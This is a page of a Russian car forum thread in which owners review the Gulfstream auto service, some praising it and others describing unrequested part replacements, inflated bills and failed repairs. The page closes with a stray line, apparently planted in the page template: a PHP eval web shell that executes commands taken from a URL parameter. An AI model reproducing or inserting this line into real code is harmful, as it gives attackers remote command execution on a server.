+ Ответить в теме
Страница 5 из 5 ПерваяПервая ... 3 4 5
Показано с 41 по 49 из 49

Тема: отзыв о сервисе


  1. #41
    GTI-Racing Мурзик is on a distinguished road Аватар для Мурзик
    Регистрация
    16.10.2006
    Сообщений
    101
    Когда судьба связывает меня с "Гольфстримом", то у меня каждый раз остается только положительное впечатление - здесь всегда помогут в решении технических проблем, ответят на все интересующие вопросы или дадут рекомендации по дальнейшему обслуживанию.
    Негатива не было ни разу, за что также огромное спасибо!

  2. #42
    GTI-Racing RussianPilot is on a distinguished road Аватар для RussianPilot
    Регистрация
    30.07.2006
    Откуда
    Жуковский
    Машина
    VR6
    Сообщений
    76
    Несколько раз обращался к ним (в основном - по электрике). Все было качественно, квалифицированно и оперативно.
    Но был один и негативный опыт: приехал с просьбой продиагностировать залипший "флажок" ручника на одном из задних суппортов на предмет того, можно ли его "оживить" + были еще какие-то мелкие работы по списку. Оставил машину, попросил прежде чем что-то менять, обязательно позвонить. Через какое-то время мне позвонили и сказали приезжать забирать машину. Приехав, обнаружил в выставленном счете 2 новых задних суппорта (а это - около 8000р.) . На мой вопрос, что они там делают, мне было сказано, что на моем суппорте флажок залип окончательно и восстановлению не подлежит, поэтому задние суппорта были заменены. Мой вопрос "Разве я просил менять задние суппорта?" ввел их в некое замешательство. Вызвали мастера, который занимался машиной. Он сказал, что "почему-то решил, что так как флажок ручника не работает, то надо поменять суппорта". В итоге предложили два варианта: поставить обратно мои старые суппорта, либо я завезу деньги за новые как-нибудь потом. Я выбрал второй вариант, так как с собой в данный момент лишних 8т.р. не было, а ставить обратно старые суппорта посчитал не совсем правильным. Надеюсь, что данный инцидент был исключением, хотя рассказы Морга, если честно, пугают...

  3. #43
    Мимо проходил GNOM is on a distinguished road Аватар для GNOM
    Регистрация
    04.04.2009
    Сообщений
    1
    Добрый вечер.
    около 2-х лет ремонтировалась в гольфстриме, были только положительные эмоции, но в последнее время очень разочарована:
    беспокоил свист, скрежет под капотом приехала в любимый сервис сказали надо менять ремень ГРМ, на что я ответила, что меняла его у них 10 т км назад, сказали да ремень в порядке просто разболтался - подтянули бесплатно.
    через 2 дня этот звук снова появился, вернулась посмотрели, сказали ролик нужно заменить - заменили
    через 1 неделю этот же звук, смотрели 1-1.5 ч сказали нужно заменить натяжитель (8т)- заказала у них,
    заодно сделала диагностику порекоменд. при замене колодк заменить диски и барабаны,
    пока ждала натяжитель (цена изменилась 10т) пришло время менять тормозные колодки, решила сделать все вместе, позвонила сказали никаких проблем все детали в наличии, записалась сказали натяжитель менять 1 ч, колодки 1ч.
    Приехала к 11, обнаружилось, что НЕТ барабанов, заказала, сказала буду ждать замену деталей, на что ответили: это часа 4, сказала приеду вечером,
    звоню в 18.00
    - готово
    -нет
    -а когда???
    -вечерам
    -а 18.00 это не вечер? сказали же, что часа 4!!!!
    -.... часов в 20.00 мы вам позв.
    -звоню в 20.00 сама: готово?
    -да доделываем, выезжайте
    приезжаю, говорят диски привезли но они не подошли, а раз их нет, смысла менять колодки тоже нет, в итоге заменили только натяжитель!!!
    отъездила 2 недели снова появился знакомый звук!!!!
    позвонила сказали надо смотреть
    привезли барабаны.
    приехала на замену дисков, барабанов, переджних и задних колодок, и устранением уже поднадоевшего ЗВУКА!!!
    при этом по замене деталей попросила сориентировать по цене сказали перед - 1,5 тыс, зад 1,5-3,5 (по деталям)
    сказала приеду к 18.00, звоню 17.30:
    -готово?
    -нет
    -а когда?
    -часам к 20.00
    - что по деньгам 20500
    -сколько????
    Думаю ладно, может из-за этого звука пришлось что то дополнительно поменять, посмотрю на месте
    Приезжаю, смотрю накладную 17 тыс зап части, а звук устранить так и не смогли, сказали не знаем что это!!!!!!!!!&# 33;!!!!!!!
    смотрю в накладной замена подш. зад. ступицы 2 шт, спрашиваю, зачем? сказали при смене бараьанов надо менять подшипники.
    это было в январе 09. 1 подш стоил 1050, один из подш я меняла у них 04.11.08 и тогда он стоил 320 руб, неужели за 2 месяца цены выросли в 3 раза???? и я сильно сомневаюсь, что за 2 мес пошипник, так износился, что подлежал замене
    далее по звуку я спросила раз звук остался, значит натяжител за 10 тыс я поменяла зря, на что мне ответили, что оказывается в данном случаее вероятность того, что звук из-за натяжителя 95 % и мне не повезло, на меня пришлось остальные 5%, хотя тогда меня уверяли, что это точно натяжитель, и не про какую вероятность я не слышала ни звука!
    затем мне сказали раз вышло такое недоразумение, когда обнаружится, что именно сломалось, то работы мне сделают бесплатно; все бы хорошо, но деталь стоила 10 тыс а например работы по замене этой детали 760 р!
    спустя мес я заметила, что на заднее колесо намоталась веревка, обратилась в шиномонтаж
    и когда мне сняли заднее колесо то сказали:
    -УЖАС КАКОЙ, КАК ВЫ ЕЗДИЕТЕ?!
    - что такое????
    - у Вас болтается барабан или что такое (я в этом мало что понимаю), спасибо хоть там все прикрутили и закрепили как положено!
    очень жаль, что такое отношение к постоянным клиентам.... так что я в поиске сервиса для своего авто, может посоветуете хороший сервис?

  4. #44
    GTI-Racing Окислитель is on a distinguished road Аватар для Окислитель
    Регистрация
    16.04.2008
    Откуда
    Москва
    Машина
    GTI 5
    Сообщений
    847
    <div class='quotetop'>Цитата(GNOM &#064; Apr 4 2009, 19&#58;12) <{POST_SNAPBACK}></div><div class='quotemain'>я в этом мало что понимаю[/b][/quote]
    хм... ключевая фраза, от неё и проблемы. жаль, что обращаясь типа к специалистам и платя им деньги,на квалифицированную помощь рассчитывать не приходится и такие проблемы сплош и рядом, причём в независимости от сервиса.

    по сабжу. учить матчасть или брать с собой человека контролирующего процесс разводки.
    Оборудование и инструмент в том числе для ремонта любимого VW.

  5. #45
    я например после сход развала в выше указанном сервисе еду покупать 2 новых баллона,а это как минимум 10.000............

  6. #46
    Мимо проходил Andrea_Hertz is on a distinguished road Аватар для Andrea_Hertz
    Регистрация
    08.04.2009
    Сообщений
    2
    был во вторник в Гольфстриме. Делали
    -замена свечей
    -ремонт стартера
    -замена масла
    -заменая ремня ГРМ
    Результат:
    -на счет свечей пока не знаю - не проверял, но теперь обязательно проверю
    -стартер: за 3000р. типа перебранный, на самом деле поставили новое втягивающее, и покрасили корпус, проблема осталась, вскрыли в другом сервисе - внутри ПИЗДЕЦ. Вопрос: за что взяли деньги? учитывая, что с втягивающим проблемм не было, видимо поставили чтоб придать вид более-менее свежего
    -масло слава Богу свежее, однако на 0.7 см выше отметки max по щупу
    -ремень новый, ролик натяжителя - не факт, скорее даже мало вероятно, известно станет лишь на следующей неделе, узнаю отпишусь.
    Но это еще не все: при мертвом стартере(крутил очень лениво и медленно) машина заводилась с пол-оборота, теперь сперва секунд 30 дрочева, зажигание в норме, движок работаеть стал ###### победишь как, и как Вы думаете в чем дело: 95% - при замене ремня промахнулись на зубец-другой, проверю на след недели - отпишусь.
    Так что это за ЕБАНЫЙ В РОТ такай и как с этим бороться.
    Простите за мат, но других слов нет, зла не хватает

  7. #47
    GTI-Racing Mr.Pooh is on a distinguished road Аватар для Mr.Pooh
    Регистрация
    01.01.2009
    Машина
    GOLF 5 TSI(170HP)
    Сообщений
    28
    Стеклоподъемник оставлял глубокие царапины снаружи на стекле. Поехал в Автоганзу на Ш.Энтузиастов. Занимались дверью 3 часа. Сказали,что почистили. Заплатил. По приезду домой обнаружил,что обшивка двери (ткань) вся грязная , пластик как будто отверткой ковыряли.
    Что делать в такой ситуации?Я думаю написать претензию.

  8. #48
    GTI-Racing lingus is on a distinguished road Аватар для lingus
    Регистрация
    06.02.2007
    Откуда
    Чехов
    Машина
    Skoda Superb 1.8T
    Сообщений
    1,214
    Цитата Сообщение от Andrea_Hertz Посмотреть сообщение
    был во вторник в Гольфстриме. Делали
    -замена свечей
    -ремонт стартера
    -замена масла
    -заменая ремня ГРМ
    Результат:
    -на счет свечей пока не знаю - не проверял, но теперь обязательно проверю
    -стартер: за 3000р. типа перебранный, на самом деле поставили новое втягивающее, и покрасили корпус, проблема осталась, вскрыли в другом сервисе - внутри ПИЗДЕЦ. Вопрос: за что взяли деньги? учитывая, что с втягивающим проблемм не было, видимо поставили чтоб придать вид более-менее свежего
    -масло слава Богу свежее, однако на 0.7 см выше отметки max по щупу
    -ремень новый, ролик натяжителя - не факт, скорее даже мало вероятно, известно станет лишь на следующей неделе, узнаю отпишусь.
    Но это еще не все: при мертвом стартере(крутил очень лениво и медленно) машина заводилась с пол-оборота, теперь сперва секунд 30 дрочева, зажигание в норме, движок работаеть стал ###### победишь как, и как Вы думаете в чем дело: 95% - при замене ремня промахнулись на зубец-другой, проверю на след недели - отпишусь.
    Так что это за ЕБАНЫЙ В РОТ такай и как с этим бороться.
    Простите за мат, но других слов нет, зла не хватает
    на volkswagen.msk уже нет про него отзывов хороших как год почти, не осталось там никого из основателей
    Skoda Superb 1.8T
    NewBeetle 2.0MT Black - продан
    VW golf VI GTi - на попечении

  9. #49
    Никита продал его все таки или нет еще? Олег от туда ушел года два назад, Дела там оч плохо шли, слышал от знакомых что Никиты хотел продать сервис, правда или нет хз

+ Ответить в теме
Страница 5 из 5 ПерваяПервая ... 3 4 5

Похожие темы

  1. Первый Отзыв О Caliber Srt-4
    от nickart в разделе Курилка
    Ответов: 4
    Последнее сообщение: 05.07.2008, 14:14
  2. отзыв о чипе от s-chipa
    от biscuit в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 164
    Последнее сообщение: 07.11.2007, 16:02
  3. Личный Отзыв
    от MORG m-customs в разделе Курилка
    Ответов: 47
    Последнее сообщение: 30.10.2007, 00:49
  4. Отзыв о Гольф5 1,6+ вопрос.
    от GrooveNK в разделе Отзывы / Выбор
    Ответов: 3
    Последнее сообщение: 01.12.2006, 09:56

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}